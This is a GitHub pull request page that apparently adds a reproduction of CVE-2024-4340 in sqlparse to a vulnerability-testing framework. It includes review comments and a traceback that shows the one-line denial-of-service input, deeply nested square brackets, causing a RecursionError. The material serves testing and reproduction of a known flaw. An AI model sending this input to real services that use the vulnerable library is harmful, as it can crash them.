Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

add CVE-2024-4340 #39

Open
wants to merge 1 commit into
base: main
Choose a base branch
from
Open

add CVE-2024-4340 #39

wants to merge 1 commit into from

Conversation

praneeth-bala
Copy link
Contributor

No description provided.

olegbck
olegbck reviewed Dec 2, 2024
View reviewed changes
CVE-2024-4340/exploit.yml

- name: Install vulnerable sqlparse version
pip:
name: sqlparse==0.4.3
Copy link
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Please put this package to the data folder and install it from file

@olegbck
Copy link
Collaborator

olegbck commented Dec 6, 2024

Also, the exploit fails to execute (as I thought so):

2024-12-06 13:15:06,323 - INFO - [ubuntu] Executing 'strace -o /tmp/cvex/ubuntu_strace_python3_0.log python3 /tmp/exploit.py'...
2024-12-06 13:15:46,558 - CRITICAL - [main] Command failed: <UnexpectedExit: cmd='strace -o /tmp/cvex/ubuntu_strace_python3_0.log python3 /tmp/exploit.py' exited=1>

After trying to run it manually, I see this:

vagrant@ubuntu:~$ python3 /tmp/exploit.py
Traceback (most recent call last):
File "/tmp/exploit.py", line 2, in
sqlparse.parse('[' * 10000 + ']' * 10000)
File "/usr/local/lib/python3.10/dist-packages/sqlparse/init.py", line 30, in parse
return tuple(parsestream(sql, encoding))
File "/usr/local/lib/python3.10/dist-packages/sqlparse/engine/filter_stack.py", line 36, in run
stmt = grouping.group(stmt)
File "/usr/local/lib/python3.10/dist-packages/sqlparse/engine/grouping.py", line 428, in group
func(stmt)
File "/usr/local/lib/python3.10/dist-packages/sqlparse/engine/grouping.py", line 53, in group_brackets
_group_matching(tlist, sql.SquareBrackets)
File "/usr/local/lib/python3.10/dist-packages/sqlparse/engine/grouping.py", line 48, in _group_matching
tlist.group_tokens(cls, open_idx, close_idx)
File "/usr/local/lib/python3.10/dist-packages/sqlparse/sql.py", line 328, in group_tokens
grp = grp_cls(subtokens)
File "/usr/local/lib/python3.10/dist-packages/sqlparse/sql.py", line 161, in init
super().init(None, str(self))
File "/usr/local/lib/python3.10/dist-packages/sqlparse/sql.py", line 165, in str
return ''.join(token.value for token in self.flatten())
File "/usr/local/lib/python3.10/dist-packages/sqlparse/sql.py", line 165, in
return ''.join(token.value for token in self.flatten())
File "/usr/local/lib/python3.10/dist-packages/sqlparse/sql.py", line 214, in flatten
yield from token.flatten()
File "/usr/local/lib/python3.10/dist-packages/sqlparse/sql.py", line 214, in flatten
yield from token.flatten()
File "/usr/local/lib/python3.10/dist-packages/sqlparse/sql.py", line 214, in flatten
yield from token.flatten()
[Previous line repeated 983 more times]
RecursionError: maximum recursion depth exceeded

Is that what the exploit is about, RecursionError? If that so, please make it more visible. I'd wrap the code of the exploit in try-except and then print "Exploit succeeded" if RecursionError is raised. Otherwise it looks like the exploit is not working.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@olegbck olegbck olegbck left review comments

Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
2 participants
@praneeth-bala @olegbck